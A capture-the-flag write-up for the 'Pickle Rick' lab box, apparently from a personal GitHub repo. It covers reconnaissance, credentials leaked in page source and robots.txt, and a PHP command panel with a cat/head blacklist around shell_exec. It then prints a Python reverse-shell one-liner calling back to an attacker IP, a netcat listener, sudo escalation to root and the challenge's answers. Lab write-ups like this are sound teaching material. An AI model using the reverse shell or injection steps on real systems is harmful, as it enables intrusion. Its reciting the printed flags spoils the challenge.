CTF-WriteUps

Writeups are the easiest mode to showcase your way of solution. This Repo is all about Writeups I Write while Playing CTF's.

View on GitHub

Pickle Rick

A Rick and Morty CTF. Help turn Rick back into a human!

So I began with nmap scan and port 22,80 is open.

$ sudo nmap -T4 -sC -sS 10.10.51.178 >nmap.out

Lets visit the website on port 80 and Nothing intresting and after inspecting the source code there was a comment which had something intresting Username: R1ckRul3s. Since its a website its worth checkcing robots.txt file, Weirdly it contains some random string Wubbalubbadubdub. Since it mentioned something about login there is a good chance of a login page of some sort on website. So lets check for login.php and there it is. now i tired to brute force it with the username obatined before but after some time I recalled there was a weird text in robots.txt file With that as password and we are in!

We have a Command Panel which reveals some intresting files, But we can’t read with cat. So next I tried with grep -r . which will display contains of everything present in the directory. Looking around all I found firt ingredient Sup3rS3cretPickl3Ingred.txt:mr. meeseek hair

While looking further I found list of blacklisted commands.

<?php
      function contains($str, array $arr)
      {
          foreach($arr as $a) {
              if (stripos($str,$a) !== false) return true;
          }
          return false;
      }
      // Cant use cat
      $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
      if(isset($_POST["command"])) {
        if(contains($_POST["command"], $cmds)) {
          echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
        } else {
          $output = shell_exec($_POST["command"]);
          echo "</br><pre>$output</pre>";
        }
      }
    ?>

Then I found a base64 string which turned out to be a Rabbit Hole! ClASSIC

So I went back to Command Panel and thought to get a reverse shell. So Best options were using some one-liners.

Since I tried python code to check it is present so I got a pyhton one-liner from Pentest Monkey Resverse Shell-Cheat-Sheet.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.155.126",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Listen on our machine.

 $ nc -nlvp 8000

We have a shell, stablize it with

 python3 -c 'import pty;pty.spawn("/bin/bash")'

And second ingredient was found

www-data@ip-10-10-60-162:/home/rick$ cat second\ ingredients           
cat second\ ingredients
1 jerry tear

After this I checked sudo permissions and found it has sudo access.

www-data@ip-10-10-60-162:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-60-162.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-60-162.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

So sudo into root and cat out final ingredient in file.

root@ip-10-10-60-162:~# ls
ls
3rd.txt  snap
root@ip-10-10-60-162:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice

With that We have the root on Pickle Rick !!